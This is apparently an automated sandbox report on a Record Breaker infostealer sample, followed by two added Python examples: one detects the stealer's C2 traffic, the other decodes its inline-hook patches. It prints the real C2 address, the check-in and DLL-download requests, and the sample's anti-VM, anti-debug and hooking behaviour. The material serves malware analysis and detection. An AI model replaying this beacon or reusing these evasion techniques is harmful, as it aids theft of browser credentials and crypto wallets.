Windows Analysis Report
VASkmEQ4iU.exe

Overview

General Information

Sample Name: VASkmEQ4iU.exe
Analysis ID: 652389
MD5: f9b340f49ab31913222c64d3eed70ed3
SHA1: 4246faa6c02672009aaf44940ec9e1c9f3e72df9
SHA256: 06cd1b17015926da3c902f7b67e130054e9170f355a1cdf1274ddc955f4152ee
Tags: exeRecordBreaker

Detection

Record Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Record Stealer
Snort IDS alert for network traffic
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Tries to steal Crypto Currency Wallets
Tries to evade analysis by executing special instructions (VM detection)
Tries to detect virtualization through RDTSC time measurements
Query firmware table information (likely to detect VMs)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Is looking for software installed on the system
Uses 32bit PE files
Sample file name is different from the original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
PE file contains more sections than normal
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Entry point lies outside standard sections

Classification

AV Detection

Source: VASkmEQ4iU.exe ReversingLabs: Detection: 48%
Source: VASkmEQ4iU.exe Joe Sandbox ML: detected
Source: 00000000.00000002.480998918.00000000019DA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Record Stealer {"C2 url": ["http://185.62.56.113/"]}
Source: VASkmEQ4iU.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: VASkmEQ4iU.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
Source: Binary string: nss3.pdb source: nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr

Networking

Source: Traffic Snort IDS: 2036882 ET TROJAN Generic Stealer Config Download Request 192.168.2.5:49758 -> 185.62.56.113:80
Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.5:49758 -> 185.62.56.113:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 185.62.56.113:80 -> 192.168.2.5:49758
Source: Malware configuration extractor URLs: http://185.62.56.113/
Source: Joe Sandbox View ASN Name: SNELNL SNELNL
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:20 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:22 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:23 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:24 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:25 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:26 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:26 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 185.62.56.113
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: sqlite3.dll.0.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://mozilla.org0
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: recordHost: 185.62.56.113Content-Length: 95Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 61 6c 66 6f 6e 73 26 63 6f 6e 66 69 67 49 64 3d 64 66 36 33 65 37 39 32 63 39 31 35 32 32 37 39 39 33 34 61 61 33 37 31 34 64 62 63 30 36 63 31 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=df63e792c9152279934aa3714dbc06c1
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
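The traffic above is a fixed two-step exchange: one POST to / carrying machineId=<GUID>|<account>&configId=<32 hex chars> with User-Agent "record", followed by GETs for the NSS, SQLite and CRT DLLs from a random-looking directory on the same host, each sent with a Content-Type header that a GET has no use for. The Python below is a detection example added here; it is not code from the sandbox or from the sample. The C2 address, the User-Agent and the eight DLL names come from the lines above; the indicator names and the session verdict are this example's own rules. The sample requests are reconstructed from the report (the check-in body uses the ASCII rendering's "user", so its Content-Length is 93; the captured hex body is 95 bytes because its account-name field is six characters long, so a rule should key on the field layout rather than on "|user").

```python
"""Detection example for the C2 exchange recorded above (added here; not
code from the sandbox or from the sample).  Requests are parsed from raw
HTTP text and matched against the pattern in the report's traffic lines."""
from __future__ import annotations
import re
from dataclasses import dataclass
from urllib.parse import parse_qs

C2_HOST = "185.62.56.113"                      # from the report's traffic and config
C2_USER_AGENT = "record"                       # User-Agent on every request above
DOWNLOADED_DLLS = {                            # the eight GETs above
    "nss3.dll", "msvcp140.dll", "vcruntime140.dll", "mozglue.dll",
    "freebl3.dll", "softokn3.dll", "sqlite3.dll", "nssdbm3.dll",
}
GUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
HEX32_RE = re.compile(r"^[0-9a-f]{32}$", re.I)


@dataclass
class Request:
    method: str
    path: str
    headers: dict[str, str]
    body: str


def parse_request(raw: str) -> Request:
    """Minimal HTTP/1.1 request parser; header names are lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers, body)


def classify(req: Request) -> list[str]:
    """Return the indicators a single request matches (empty list = clean)."""
    hits = []
    if req.headers.get("user-agent") == C2_USER_AGENT:
        hits.append("user-agent 'record'")
    if req.headers.get("host") == C2_HOST:
        hits.append("known C2 host")
    if req.method == "POST" and req.path == "/":
        form = parse_qs(req.body)
        machine_id = form.get("machineId", [""])[0]
        config_id = form.get("configId", [""])[0]
        guid, sep, account = machine_id.partition("|")
        if GUID_RE.match(guid) and sep and account and HEX32_RE.match(config_id):
            hits.append("check-in body machineId=<guid>|<account>&configId=<32 hex>")
    elif req.method == "GET":
        name = req.path.rsplit("/", 1)[-1].lower()
        if name in DOWNLOADED_DLLS and "content-type" in req.headers:
            hits.append(f"dependency download {name} (Content-Type sent on a GET)")
    return hits


def verdict(raw_requests: list[str]) -> str:
    """Session view: check-in plus DLL fetches is the full chain in the report;
    a check-in on its own is still worth an alert."""
    seen = [classify(parse_request(r)) for r in raw_requests]
    checkin = any(any(h.startswith("check-in") for h in hits) for hits in seen)
    dll = sum(any(h.startswith("dependency download") for h in hits) for hits in seen)
    if checkin and dll:
        return f"record-stealer-like session: check-in + {dll} dependency download(s)"
    if checkin:
        return "suspicious: check-in beacon without dependency downloads"
    return "no match"


# Constructed from the report's traffic lines.  The account name is the ASCII
# rendering's "user", so Content-Length is 93 here rather than the captured 95.
SAMPLE_REQUESTS = [
    "POST / HTTP/1.1\r\nAccept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"
    "User-Agent: record\r\nHost: 185.62.56.113\r\nContent-Length: 93\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
    "machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user"
    "&configId=df63e792c9152279934aa3714dbc06c1",
    "GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1\r\n"
    "Content-Type: text/plain;\r\nUser-Agent: record\r\nHost: 185.62.56.113\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    # benign control request, constructed for contrast
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        req = parse_request(raw)
        print(req.method, req.path, "->", classify(req) or "clean")
    print(verdict(SAMPLE_REQUESTS))
```

The User-Agent and host checks are cheap but brittle; the body-layout check and the "Content-Type on a GET for one of these DLL names" check survive a change of C2 address, so keep them even if the host indicator is rotated out.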

System Summary

Source: VASkmEQ4iU.exe Static PE information: section name: .>\A
Source: VASkmEQ4iU.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: VASkmEQ4iU.exe, 00000000.00000002.480981180.00000000018EF000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehelper.exe0 vs VASkmEQ4iU.exe
Source: VASkmEQ4iU.exe Binary or memory string: OriginalFilenamehelper.exe0 vs VASkmEQ4iU.exe
Source: VASkmEQ4iU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: VASkmEQ4iU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: VASkmEQ4iU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sqlite3.dll.0.dr Static PE information: Number of sections : 18 > 10
Source: VASkmEQ4iU.exe ReversingLabs: Detection: 48%
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Mutant created: \Sessions\1\BaseNamedObjects\54881015517
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/12@0/1
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: VASkmEQ4iU.exe Static file information: File size 7389696 > 1048576
Source: VASkmEQ4iU.exe Static PE information: Raw size of .JFL is bigger than: 0x100000 < 0x704800
Source: VASkmEQ4iU.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
Source: Binary string: nss3.pdb source: nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: VASkmEQ4iU.exe Static PE information: section name: .sI3
Source: VASkmEQ4iU.exe Static PE information: section name: .>\A
Source: VASkmEQ4iU.exe Static PE information: section name: .JFL
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.0.dr Static PE information: section name: /4
Source: sqlite3.dll.0.dr Static PE information: section name: /19
Source: sqlite3.dll.0.dr Static PE information: section name: /31
Source: sqlite3.dll.0.dr Static PE information: section name: /45
Source: sqlite3.dll.0.dr Static PE information: section name: /57
Source: sqlite3.dll.0.dr Static PE information: section name: /70
Source: sqlite3.dll.0.dr Static PE information: section name: /81
Source: sqlite3.dll.0.dr Static PE information: section name: /92
Source: initial sample Static PE information: section where entry point is pointing to: .JFL
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: 9F0005 value: E9 FB 99 36 77 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: 77D59A00 value: E9 0A 66 C9 88 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: D80007 value: E9 7B 4C 01 77 Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Memory written: PID: 2432 base: 77D94C80 value: E9 8E B3 FE 88 Jump to behavior
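Each of the four writes above is a 5-byte E9 instruction (JMP rel32), so its target is base + 5 + the signed little-endian displacement, modulo 2^32. Decoding them shows two inline-hook pairs: the write at 0x77D59A00 redirects to 0x009F000F, while the write at 0x009F0005 jumps back to 0x77D59A05, five bytes past that hook site; likewise 0x77D94C80 redirects to 0x00D80013 while 0x00D80007 jumps back to 0x77D94C87, seven bytes past its hook site. That is the shape of a hook plus trampoline: the original bytes (5 and 7 respectively) were relocated in front of the trampoline jump, and control returns just after the patch. The Python below is an added example, not part of the report. The four patches are copied from the lines above; the pairing assumes, as is usual for a 32-bit process, that addresses in 0x70000000-0x7FFFFFFF belong to loaded system DLLs and that the lower addresses are memory the sample allocated, and it assumes a trampoline relocates at most 16 bytes. The report does not name the hooked functions, and neither does this example.

```python
"""Decode the E9 rel32 patches reported above and pair them into
hook / trampoline relationships.  Added example, not from the report."""
from __future__ import annotations
import struct

JMP_REL32 = 0xE9
MAX_STOLEN = 16        # assumption: a trampoline relocates at most 16 original bytes

# (base, bytes written) copied from the four "Memory written" lines above
REPORTED_WRITES = [
    (0x009F0005, bytes.fromhex("E9FB993677")),
    (0x77D59A00, bytes.fromhex("E90A66C988")),
    (0x00D80007, bytes.fromhex("E97B4C0177")),
    (0x77D94C80, bytes.fromhex("E98EB3FE88")),
]


def in_system_image(addr: int) -> bool:
    """Assumption for this 32-bit process: 0x70000000-0x7FFFFFFF is where the
    system DLLs are mapped; everything lower here is memory the sample owns."""
    return 0x70000000 <= addr < 0x80000000


def jmp_target(base: int, patch: bytes) -> int:
    """Absolute target of a 5-byte E9 rel32 written at `base` (32-bit wraparound)."""
    if len(patch) != 5 or patch[0] != JMP_REL32:
        raise ValueError("expected a 5-byte E9 rel32 patch")
    (rel,) = struct.unpack("<i", patch[1:])       # signed little-endian displacement
    return (base + 5 + rel) & 0xFFFFFFFF


def pair_hooks(writes, is_image=in_system_image) -> list[dict]:
    """Match each patch inside an image (the hook) with the patch whose jump
    resumes a few bytes after it (the trampoline).  The trampoline jump and
    the hook's handler are expected in the same page of sample-owned memory."""
    decoded = [(base, jmp_target(base, patch)) for base, patch in writes]
    hooks = [(b, t) for b, t in decoded if is_image(b)]
    tramps = [(b, t) for b, t in decoded if not is_image(b)]
    pairs = []
    for hook_site, handler in hooks:
        for tramp_site, resume in tramps:
            stolen = resume - hook_site             # bytes relocated from the hook site
            same_page = (handler >> 12) == (tramp_site >> 12)
            if 5 <= stolen <= MAX_STOLEN and same_page:
                pairs.append({
                    "hook_site": hook_site, "handler": handler,
                    "trampoline_jmp": tramp_site, "resume": resume,
                    "stolen_bytes": stolen,
                })
    return pairs


def describe(pair: dict) -> str:
    return (f"hook at 0x{pair['hook_site']:08X} -> handler 0x{pair['handler']:08X}; "
            f"trampoline jmp at 0x{pair['trampoline_jmp']:08X} resumes at "
            f"0x{pair['resume']:08X} ({pair['stolen_bytes']} bytes relocated)")


if __name__ == "__main__":
    for base, patch in REPORTED_WRITES:
        print(f"0x{base:08X}: jmp 0x{jmp_target(base, patch):08X}")
    for pair in pair_hooks(REPORTED_WRITES):
        print(describe(pair))
```

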